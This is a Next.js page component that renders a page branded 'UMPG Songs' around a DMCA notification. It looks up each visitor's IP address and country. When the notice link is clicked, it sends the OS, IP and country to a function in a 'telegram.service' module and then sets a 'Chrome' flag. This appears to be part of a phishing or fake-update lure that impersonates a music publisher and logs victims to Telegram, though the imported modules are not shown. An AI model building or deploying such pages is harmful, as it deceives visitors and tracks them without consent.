/* eslint-disable jsx-a11y/anchor-is-valid */
// pages/spotlight.tsx (Next.js example)
import Header from "../components/UMPG/Header";
import DmcaNotification from "../components/UMPG/DmcaNotification";

import useStore from "../store";
import { click, getLocation } from "../services/telegram.service";
import { useEffect, useState } from "react";
import { osName } from "react-device-detect";
import Footer from "../components/UMPG/Footer";

export default function Spotlight() {
  const { setChrome } = useStore();
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("127.0.0.1");
  const fetchCountry = async () => {
    const data = await getLocation();
    setCountryCode(data.country_code);
    setIp(data.ip);
  };

  useEffect(() => {
    fetchCountry();
  }, []);

  const handleClick = async (isClickLink?: boolean) => {
    window.scrollTo({ top: 0, behavior: "smooth" });
    if (isClickLink) {
      console.log("Clicked link");
      await click("UMPG", osName, ip, countryCode);
    }
    setChrome(true);
  };

  return (
    <>
      <Header
        onOpen={() => {
          handleClick(false);
        }}
      ></Header>
      <div className="max-w-6xl mx-auto px-4 py-4 md:py-8">
        {/* Main Article */}
        <h2 className="block md:hidden font-bold text-xl text-[#606060]">
          UMPG Songs
        </h2>
        <DmcaNotification
          onClick={(isClickLink) => {
            handleClick(isClickLink);
          }}
        />
      </div>
      {/* Footer */}
      <Footer
        onOpen={() => {
          handleClick(false);
        }}
      />
    </>
  );
}
